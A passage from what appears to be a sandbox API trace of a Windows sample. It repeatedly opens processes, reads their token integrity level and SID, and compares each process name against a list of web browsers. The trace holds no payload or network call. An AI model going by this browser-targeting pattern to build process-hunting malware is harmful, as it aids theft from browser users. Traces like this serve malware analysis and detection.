(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0xb4 [0227.060] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166e70, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0227.060] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0227.061] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0227.061] GetLastError () returned 0x7a [0227.061] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0227.061] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0227.061] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0227.061] CloseHandle (hObject=0xb8) returned 1 [0227.061] CloseHandle (hObject=0xb4) returned 1 [0227.061] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0227.061] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0227.061] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0227.062] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0227.062] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0227.062] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0227.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0xb4 [0227.062] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0227.062] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0227.062] GetLastError () returned 0x7a [0227.062] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0227.062] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0227.062] CloseHandle (hObject=0xb8) returned 1 [0227.063] CloseHandle (hObject=0xb4) returned 1 [0227.063] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0227.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0xb4 [0227.063] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166fa8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0227.063] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0227.063] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0227.063] GetLastError () returned 0x7a [0227.063] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0227.063] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0227.064] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0227.064] CloseHandle (hObject=0xb8) returned 1 [0227.064] CloseHandle (hObject=0xb4) returned 1 [0227.064] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0227.064] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0227.064] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0227.064] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0227.064] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0227.064] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0227.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0xb4 [0227.064] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0227.065] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0227.065] GetLastError () returned 0x7a [0227.065] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0227.065] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0227.065] CloseHandle (hObject=0xb8) returned 1 [0227.065] CloseHandle (hObject=0xb4) returned 1 [0227.065] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0227.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0xb4 [0227.066] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1670b8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0227.066] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0227.066] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0227.066] GetLastError () returned 0x7a [0227.066] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0227.066] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0227.066] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0227.066] CloseHandle (hObject=0xb8) returned 1 [0227.066] CloseHandle (hObject=0xb4) returned 1 [0227.067] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0227.067] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0227.067] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0227.067] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0227.067] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0227.067] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0227.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0xb4 [0227.067] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0227.067] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0227.067] GetLastError () returned 0x7a [0227.067] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0227.067] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0227.067] CloseHandle (hObject=0xb8) returned 1 [0227.068] CloseHandle (hObject=0xb4) returned 1 [0227.068] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0227.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0xb4 [0227.068] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1671f0, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0227.068] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0227.068] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0227.068] GetLastError () returned 0x7a [0227.068] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0227.068] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0227.068] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0227.068] CloseHandle (hObject=0xb8) returned 1 [0227.068] CloseHandle (hObject=0xb4) returned 1 [0227.068] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0227.069] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0227.069] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0227.069] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0227.069] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0227.069] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0227.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0xb4 [0227.069] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0227.069] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0227.069] GetLastError () returned 0x7a [0227.069] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0227.069] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0227.069] CloseHandle (hObject=0xb8) returned 1 [0227.069] CloseHandle (hObject=0xb4) returned 1 [0227.069] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0227.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0xb4 [0227.070] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167320, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0227.070] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0227.070] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0227.070] GetLastError () returned 0x7a [0227.070] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0227.070] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0227.070] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0227.070] CloseHandle (hObject=0xb8) returned 1 [0227.070] CloseHandle (hObject=0xb4) returned 1 [0227.070] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0227.070] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0227.070] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0227.070] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0227.070] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0227.071] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0227.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0xb4 [0227.071] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0227.071] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0227.071] GetLastError () returned 0x7a [0227.071] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0227.071] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0227.071] CloseHandle (hObject=0xb8) returned 1 [0227.071] CloseHandle (hObject=0xb4) returned 1 [0227.071] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0227.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0xb4 [0227.071] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167460, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0227.071] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0227.072] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0227.072] GetLastError () returned 0x7a [0227.072] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0227.072] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0227.072] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0227.072] CloseHandle (hObject=0xb8) returned 1 [0227.072] CloseHandle (hObject=0xb4) returned 1 [0227.072] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0227.072] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0227.072] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0227.072] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0227.072] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0227.072] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0227.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0xb4 [0227.072] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0227.072] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0227.072] GetLastError () returned 0x7a [0227.072] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0227.073] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0227.073] CloseHandle (hObject=0xb8) returned 1 [0227.073] CloseHandle (hObject=0xb4) returned 1 [0227.073] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0227.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0xb4 [0227.073] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167578, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0227.073] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0227.073] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0227.073] GetLastError () returned 0x7a [0227.073] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0227.073] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0227.073] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0227.073] CloseHandle (hObject=0xb8) returned 1 [0227.073] CloseHandle (hObject=0xb4) returned 1 [0227.073] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0227.073] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0227.073] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0227.073] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0227.074] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0227.074] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0227.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0xb4 [0227.074] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0227.074] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0227.074] GetLastError () returned 0x7a [0227.074] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0227.074] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0227.074] CloseHandle (hObject=0xb8) returned 1 [0227.074] CloseHandle (hObject=0xb4) returned 1 [0227.074] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0227.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0xb4 [0227.074] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167688, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0227.074] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0227.074] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0227.074] GetLastError () returned 0x7a [0227.074] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0227.074] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0227.075] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, 